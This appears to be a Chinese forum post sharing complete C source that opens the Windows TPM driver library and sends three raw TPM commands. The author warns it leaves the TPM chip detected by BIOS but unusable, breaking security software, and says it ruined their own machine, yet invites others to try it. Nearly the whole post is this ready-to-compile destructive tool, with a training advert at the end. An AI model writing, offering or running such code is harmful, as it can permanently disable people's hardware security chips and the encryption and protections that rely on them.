注意:本程序会使 TPM 芯片虽然能被 bios 正确认识,却会是 TPM 芯片无法使用,
如 IBM client security 等软件无法工作,破坏性较大,请测试使用,我的机器已经挂掉了
贴出如下源码:
#include <windows.h>
UCHAR cmd1[12] = {
0x0,
0xC1,
0x0,
0x0,
0x0,
0xC,
0x40,
0x0,
0x0,
0xA,
0x0,
0x58
};
UCHAR cmd2[10] =
{
0x0,
0xC1,
0x0,
0x0,
0x0,
0xA,
0x0,
0x0,
0x0,
0x5D
};
UCHAR cmd3[10] =
{
0x0,
0xC1,
0x0,
0x0,
0x0,
0xA,
0x0,
0x0,
0x0,
0x5B
};
typedef UINT32 (__cdecl *PFN_TDDL_Open)(void);
//close a open connection to the TPM device driver
typedef UINT32 (__cdecl *PFN_TDDL_Close)(void);
typedef UINT32 (__cdecl *PFN_TDDL_TransmitData)(
BYTE *pTransmitBuf,
UINT32 TransmitBufLen,
BYTE *pReceiveBuf,
UINT32 *puntReceiveBufLen);
// Vista 以后需要 uac 权限
int main(int argc,char* argv[])
{
PFN_TDDL_Open pfn_Open;
PFN_TDDL_Close pfn_Close;
PFN_TDDL_TransmitData pfn_TransmitData;
UCHAR Result[1024];
UINT32 ResultLen;
// Lenovo / Ateml / Intel 芯片
HMODULE hTddl = LoadLibrary("TPMDDL.dll");
if(!hTddl)
{
hTddl = LoadLibrary("TDDL.dll");
}
if(!hTddl) return -1; // 没有的 tpm 系统
pfn_Open = (PFN_TDDL_Open)GetProcAddress(hTddl,"TDDL_Open");
pfn_Close =(PFN_TDDL_Close)GetProcAddress(hTddl,"TDDL_Close");
pfn_TransmitData =(PFN_TDDL_TransmitData)GetProcAddress(hTddl,"TDDL_TransmitData");
Result[0] = 0x0;
Result[1] = 0xC4;
if(pfn_Open() == 0)
{
ResultLen = 1024;
pfn_TransmitData((PUCHAR)cmd1,
12,
(PUCHAR)Result,
&ResultLen);
pfn_TransmitData((PUCHAR)cmd2,
10,
(PUCHAR)Result,
&ResultLen);
pfn_TransmitData((PUCHAR)cmd3,
10,
(PUCHAR)Result,
&ResultLen);
pfn_Close();
}
return 0;
}
向 蛋疼的 TPM 致敬!!!
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)